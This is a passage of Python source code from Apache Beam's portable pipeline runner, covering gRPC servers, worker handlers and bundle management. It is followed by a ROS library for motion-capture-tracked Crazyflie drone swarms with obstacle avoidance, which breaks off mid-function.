self.data_plane_handler = data_plane.BeamFnDataServicer()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=2),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
logging.info('starting state server on port %s', self.state_port)
logging.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self, state, provision_info, grpc_server):
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler, self._grpc_server.data_plane_handler,
state, provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info, grpc_server):
super(ExternalWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
def host_from_worker(self):
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info,
grpc_server)
if payload:
num_workers, state_cache_size = payload.decode('ascii').split(',')
self._num_threads = int(num_workers)
self._state_cache_size = int(state_cache_size)
else:
self._num_threads = 1
self._state_cache_size = STATE_CACHE_SIZE
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, worker_count=self._num_threads,
state_cache_size=self._state_cache_size, worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
# The subprocesses module is not threadsafe on Python 2.7. Use this lock to
# prevent concurrent calls to POpen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info, grpc_server):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._container_image = payload.container_image
self._container_id = None
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
logging.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
logging.info('Waiting for docker to start up.Current status is %s' %
status)
if status == b'running':
logging.info('Docker container is running. container_id = %s, '
'worker_id = %s', self._container_id, self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start. Final status is %s' % status)
time.sleep(1)
def stop_worker(self):
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(list)
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None
def get_worker_handlers(self, environment_id, num_workers):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
max_total_workers = num_workers * len(self._environments)
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
pass # no need for a gRPC server
elif self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info,
max_total_workers)
elif max_total_workers > self._grpc_server.max_workers:
# each gRPC server is running with fixed number of threads (
# max_total_workers), which is defined by the first call to
# get_worker_handlers(). Assumption here is a worker has a connection to a
# gRPC server. In case a stage tries to add more workers
# than the max_total_workers, some workers cannot connect to gRPC and
# pipeline will hang, hence raise an error here.
raise RuntimeError('gRPC servers are running with %s threads, we cannot '
'attach %s workers.' % (self._grpc_server.max_workers,
max_total_workers))
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment, self._state, self._job_provision_info,
self._grpc_server)
logging.info("Created Worker handler %s for environment %s",
worker_handler, environment)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
logging.error("Error closing worker_handler %s" % worker_handler,
exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=FnApiRunner.get_cache_token_generator()):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None
self._cache_token_generator = cache_token_generator
def _send_input_to_worker(self,
process_bundle_id,
read_transform_id,
byte_streams):
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs,
process_bundle_id):
split_results = []
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_id=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(
process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_id=self._bundle_descriptor.id,
cache_tokens=[next(self._cache_token_generator)]))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = []
with ProgressRequester(
self._worker_handler, process_bundle_id, self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
if output.transform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(
expected_outputs[output.transform_id]).append(output.data)
logging.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=
beam_fn_api_pb2.FinalizeBundleRequest(
instruction_id=process_bundle_id
))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=None, **kwargs):
super(ParallelBundleManager, self).__init__(
worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency, skip_registration,
cache_token_generator=cache_token_generator)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self, inputs, expected_outputs):
part_inputs = [{} for _ in range(self._num_workers)]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None
split_result_list = []
with futures.ThreadPoolExecutor(max_workers=self._num_workers) as executor:
for result, split_result in executor.map(lambda part: BundleManager(
self._worker_handler_list, self._get_buffer,
self._get_input_coder_impl, self._bundle_descriptor,
self._progress_frequency, self._registered,
cache_token_generator=self._cache_token_generator).process_bundle(
part, expected_outputs), part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self, worker_handler, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_id=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, includes user metrics only.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._monitoring_infos = step_monitoring_infos
for smi in step_monitoring_infos.values():
counters, distributions, gauges = \
portable_metrics.from_monitoring_infos(smi, user_metrics_only)
self._counters.update(counters)
self._distributions.update(distributions)
self._gauges.update(gauges)
def query(self, filter=None):
counters = [MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
swarmlib.py
|
#!/usr/bin/env python
from __future__ import division
import rospy
import tf
from geometry_msgs.msg import PoseStamped, TransformStamped, Twist
from nav_msgs.msg import Path
from visualization_msgs.msg import Marker
from math import *
import math
import time
from time import sleep
from std_srvs.srv import Empty
from tf2_msgs.msg import TFMessage
import message_filters
import sys
import numpy as np
import serial
from scipy.integrate import odeint
from tf import TransformListener
from crazyflie_driver.msg import FullState
from crazyflie_driver.msg import Position
from multiprocessing import Process
import os
np.set_printoptions(formatter={'float': '{: 0.2f}'.format})
# Main classes ####################################################################
class Swarm_manager():
def __init__(self,drone_name_list):
self.drone_name_list = drone_name_list
drone_object_list = []
for drone_name in self.drone_name_list:
drone_object = drone(drone_name)
drone_object_list.append(drone_object)
return drone_object_list
def update_position_for_all(self, drone_object_list):
for drone_object in drone_object_list:
drone_object.position()
class Mocap_object: # superclass
def __init__(self, name):
self.name = name
self.tf = '/vicon/'+name+'/'+name
self.tl = TransformListener()
self.pose = np.array([0.,0.,0.])
self.orient = np.array([0,0,0]) # Euler angles
self.path = Path()
# for velocity:
sub = message_filters.Subscriber(self.tf, TransformStamped)
self.cache = message_filters.Cache(sub, 100)
self.vel = np.array([0,0,0])
def position(self):
self.tl.waitForTransform("/world", self.tf, rospy.Time(0), rospy.Duration(1))
position, quaternion = self.tl.lookupTransform("/world", self.tf, rospy.Time(0))
self.pose = np.array(position)
return np.array(position)
def orientation(self):
self.tl.waitForTransform("/world", self.tf, rospy.Time(0), rospy.Duration(1))
position, quaternion = self.tl.lookupTransform("/world", self.tf, rospy.Time(0))
self.orient = get_angles(np.array(quaternion))
return get_angles(np.array(quaternion))
def publish_position(self):
publish_pose(self.pose, self.orient, self.name+"_pose")
def publish_path(self, limit=1000):
publish_path(self.path, self.pose, self.orient, self.name+"_path", limit)
def velocity(self):
aver_interval = 0.1 # sec
msg_past = self.cache.getElemAfterTime(self.cache.getLatestTime() - rospy.rostime.Duration(aver_interval))
msg_now = self.cache.getElemAfterTime(self.cache.getLatestTime())
if (msg_past is not None) and (msg_now is not None) and (msg_now.header.stamp != msg_past.header.stamp):
vel = vel_estimation_TransformStamped(msg_past, msg_now)
self.vel = vel
class Obstacle(Mocap_object):
def __init__(self, name='obstacle'):
Mocap_object.__init__(self, name)
self.R = 0.1
self.pose = np.array([0,0,0])
self.orient = np.array([0,0,0])
self.dist_to_drones = []
self.attractive_coef = 1./700
self.repulsive_coef = 200
def publish_position(self):
# publish_pose(self.pose, self.orient, self.name+"_pose")
publish_cylinder(self.pose, self.orient, self.R, self.name+"_cylinder")
def calculate_dist(self, drones_poses):
for i in range(len(drones_poses)):
self.dist_to_drones[i] = np.linalg.norm(drones_poses[i]-self.pose)
def safety_borders(self, R, N=1000):
""" circumference near obstacle """
C = np.zeros((N,2))
C[:,0] = self.pose[0] + R*np.cos(np.linspace(-pi,pi,N))
C[:,1] = self.pose[1] + R*np.sin(np.linspace(-pi,pi,N))
return C
class Drone(Mocap_object): # TODO: use superclass mocap_object
def __init__(self, name, leader = False):
Mocap_object.__init__(self, name)
self.leader = leader
self.sp = np.array([0.,0.,0.])
self.near_obstacle = False
self.nearest_obstacle = None
self.rad_imp = radius_impedance_model() # Obstacle avoidance
sub_sp = message_filters.Subscriber(self.name+"_sp", PoseStamped)
self.cache_sp = message_filters.Cache(sub_sp, 100)
self.vel_sp = np.array([0,0,0])
def publish_sp(self):
publish_pose(self.sp, np.array([0,0,0]), self.name+"_sp")
def publish_path_sp(self, limit=1000):
publish_path(self.path, self.sp, self.orient, self.name+"_path_sp", limit)
def fly(self):
publish_goal_pos(self.sp, 0, "/"+self.name)
def apply_limits(self, uper_limits, lower_limits):
np.putmask(self.sp, self.sp >= uper_limits, uper_limits)
np.putmask(self.sp, self.sp <= lower_limits, lower_limits)
def update_radius_imp(self, delta):
if self.rad_imp.inside:
radius_obstacle_impedance(self)
self.sp += self.rad_imp.pose
def velocity_sp(self):
aver_interval = 0.2 # sec
if self.cache_sp.getLatestTime() is not None:
msg_past = self.cache_sp.getElemAfterTime(self.cache_sp.getLatestTime() - rospy.rostime.Duration(aver_interval))
msg_now = self.cache_sp.getElemAfterTime(self.cache_sp.getLatestTime())
if (msg_past is not None) and (msg_now is not None) and (msg_now.header.stamp != msg_past.header.stamp):
vel_sp = vel_estimation_PoseStamped(msg_past, msg_now)
self.vel_sp = vel_sp
class radius_impedance_model:
def __init__(self):
self.inside = False
self.penetration = None
self.imp_pose = 0
self.imp_vel = 0
self.time_prev = time.time()
# Service functions ###############################################################
def publish_goal_pos(cf_goal_pos, cf_goal_yaw, cf_name):
name = cf_name + "/cmd_position"
msg = msg_def_crazyflie(cf_goal_pos, cf_goal_yaw)
pub = rospy.Publisher(name, Position, queue_size=1)
pub.publish(msg)
def publish_pose(pose, orient, topic_name):
msg = msg_def_PoseStamped(pose, orient)
pub = rospy.Publisher(topic_name, PoseStamped, queue_size=1)
pub.publish(msg)
def publish_cylinder(pose, orient, R, topic_name):
shape = Marker.CYLINDER
msg = msg_def_Cylinder(pose, orient, shape, R=R)
pub = rospy.Publisher(topic_name, Marker, queue_size=1)
pub.publish(msg)
def publish_path(path, pose, orient, topic_name, limit=1000):
msg = msg_def_PoseStamped(pose, orient)
path.header = msg.header
path.poses.append(msg)
if limit>0:
path.poses = path.poses[-limit:]
pub = rospy.Publisher(topic_name, Path, queue_size=1)
pub.publish(path)
def publish_vel(vel, topic_name):
msg = Twist()
msg.linear.x = vel[0]
msg.linear.y = vel[1]
msg.linear.z = vel[2]
pub = rospy.Publisher(topic_name, Twist, queue_size=1)
pub.publish(msg)
def get_angles(message):
quat = ( message[0], message[1], message[2], message[3] )
euler = tf.transformations.euler_from_quaternion(quat)
return euler
def msg_def_crazyflie(pose, yaw):
worldFrame = rospy.get_param("~worldFrame", "/world")
msg = Position()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = worldFrame
msg.x = pose[0]
msg.y = pose[1]
msg.z = pose[2]
msg.yaw = yaw
now = rospy.get_time()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
return msg
def msg_def_PoseStamped(pose, orient):
worldFrame = "world"
msg = PoseStamped()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = worldFrame
msg.pose.position.x = pose[0]
msg.pose.position.y = pose[1]
msg.pose.position.z = pose[2]
quaternion = tf.transformations.quaternion_from_euler(orient[0], orient[1], orient[2]) #1.57
msg.pose.orientation.x = quaternion[0]
msg.pose.orientation.y = quaternion[1]
msg.pose.orientation.z = quaternion[2]
msg.pose.orientation.w = quaternion[3]
msg.header.seq += 1
return msg
def msg_def_Cylinder(pose, orient, shape, R):
worldFrame = "world"
msg = Marker()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = worldFrame
msg.type = shape
msg.pose.position.x = pose[0]
msg.pose.position.y = pose[1]
msg.pose.position.z = pose[2] * 0.5
# quaternion = tf.transformations.quaternion_from_euler(orient[0], orient[1], orient[2])
quaternion = tf.transformations.quaternion_from_euler(0,0,0)
msg.pose.orientation.x = quaternion[0]
msg.pose.orientation.y = quaternion[1]
msg.pose.orientation.z = quaternion[2]
msg.pose.orientation.w = quaternion[3]
msg.scale.x = R
msg.scale.y = R
msg.scale.z = 2.0
msg.color.r = 0.0
msg.color.g = 1.0
msg.color.b = 0.0
msg.color.a = 1.0
msg.header.seq += 1
msg.header.stamp = rospy.Time.now()
return msg
def rotate(origin, drone, human): # rotate drone around point
"""
Rotate a point counterclockwise by a given angle around a given origin.
The angle should be given in radians.
"""
ox, oy = origin[0], origin[1]
px, py = drone.sp[0], drone.sp[1]
qx = ox + math.cos(human.orientation()[2]) * (px - ox) - math.sin(human.orientation()[2]) * (py - oy)
qy = oy + math.sin(human.orientation()[2]) * (px - ox) + math.cos(human.orientation()[2]) * (py - oy)
return np.array([qx, qy, drone.sp[2]])
def centroid_calc(drone1, drone2, drone3): # centroid of triangle
x_aver = np.array([drone1.sp[0], drone2.sp[0], drone3.sp[0]])
y_aver = np.array([drone1.sp[1], drone2.sp[1], drone3.sp[1]])
z_aver = np.array([drone1.sp[2], drone2.sp[2], drone3.sp[2]])
centroid = np.array([ np.mean(x_aver), np.mean(y_aver), np.mean(z_aver) ])
return centroid
def vel_estimation_TransformStamped(msg_past, msg_now): # from two TransformStamped messages
x_now = msg_now.transform.translation.x
x_past = msg_past.transform.translation.x
y_now = msg_now.transform.translation.y
y_past = msg_past.transform.translation.y
z_now = msg_now.transform.translation.z
z_past = msg_past.transform.translation.z
time_now = msg_now.header.stamp.to_sec()
time_past = msg_past.header.stamp.to_sec()
vel_x = (x_now-x_past)/(time_now-time_past)
vel_y = (y_now-y_past)/(time_now-time_past)
vel_z = (z_now-z_past)/(time_now-time_past)
vel = np.array([vel_x, vel_y, vel_z])
return vel
def vel_estimation_PoseStamped(msg_past, msg_now): # from two TransformStamped messages
x_now = msg_now.pose.position.x
x_past = msg_past.pose.position.x
y_now = msg_now.pose.position.y
y_past = msg_past.pose.position.y
z_now = msg_now.pose.position.z
z_past = msg_past.pose.position.z
time_now = msg_now.header.stamp.to_sec()
time_past = msg_past.header.stamp.to_sec()
vel_x = (x_now-x_past)/(time_now-time_past)
vel_y = (y_now-y_past)/(time_now-time_past)
vel_z = (z_now-z_past)/(time_now-time_past)
vel = np.array([vel_x, vel_y, vel_z])
return vel
# Obstacle avoidance functions #######################################################
def update_obstacle(drone, obstacle, R):
# obstacle_pose = obstacle.position()[:2]
# drone_pose = drone.sp[:2]
dist = np.linalg.norm(obstacle.position()[:2]-drone.sp[:2]) # in 2D
if dist<R:
updated_pose = quad_prog_circle(drone.sp, obstacle.position(), R)
drone.near_obstacle = True
drone.nearest_obstacle = obstacle
drone.rad_imp.inside = True
drone.rad_imp.penetration = updated_pose - drone.sp[:2]
else:
# updated_pose = drone_pose
drone.near_obstacle = False
drone.nearest_obstacle = None
drone.rad_imp.inside = False
drone.rad_imp.penetration = None
drone.rad_imp.imp_pose = 0
drone.rad_imp.imp_vel = np.linalg.norm(drone.vel_sp[:2]) # 0
drone.rad_imp.time_prev = time.time()
return drone
# Obstacle avoidance functions #######################################################
def pose_update_obstacle_circle(drone, R):
updated_pose = quad_prog_circle(drone.sp, drone.nearest_obstacle.position(), R)
drone.sp = np.append(updated_pose, drone.sp[2])
return drone
# # Obstacle avoidance functions #######################################################
# def pose_update_obstacle(drone, obstacle, R):
# obstacle_pose = obstacle.position()[:2]
# drone_pose = drone.sp[:2]
# dist = np.linalg.norm(obstacle_pose-drone_pose)
# if dist<R:
# updated_pose = quad_prog_circle(drone_pose, obstacle_pose, R)
# drone.obstacle_update_status = [True, obstacle.name]
# drone.rad_imp.inside = True
# else:
# updated_pose = drone_pose
# drone.obstacle_update_status = [False, None]
# drone.rad_imp.inside = False
# drone.rad_imp.penetration = updated_pose - drone_pose
# # delta = updated_pose - drone_pose
# drone.sp = np.append(updated_pose, drone.sp[2])
# return drone#, delta
def quad_prog_circle(drone_pose, obstacle_pose, R):
drone_pose = drone_pose[:2] # in 2D
obstacle_pose = obstacle_pose[:2] # in 2D
eq1 = np.array([ [obstacle_pose[0],1], [drone_pose[0],1] ])
eq2 = np.array([obstacle_pose[1],drone_pose[1]])
line_equation = np.linalg.solve(eq1, eq2)
k = line_equation[0]
b = line_equation[1]
a_ = k**2+1
b_ = 2*k*b - 2*k*obstacle_pose[1] -2*obstacle_pose[0]
c_ = obstacle_pose[1]**2 - R**2 + obstacle_pose[0]**2 - 2*b*obstacle_pose[1] + b**2
D = (b_**2) - (4*a_*c_)
if D>0:
x_1 = (-b_-sqrt(D))/(2*a_)
x_2 = (-b_+sqrt(D))/(2*a_)
y_1 = k * x_1 + b
y_2 = k * x_2 + b
point1 = np.array([ x_1, y_1])
point2 = np.array([ x_2, y_2])
dist_point1 = np.linalg.norm(point1 - drone_pose)
dist_point2 = np.linalg.norm(point2 - drone_pose)
if dist_point1 < dist_point2:
updated_pose = point1
else:
updated_pose = point2
return updated_pose
def Pendulum(state, t, M):
theta, omega = state
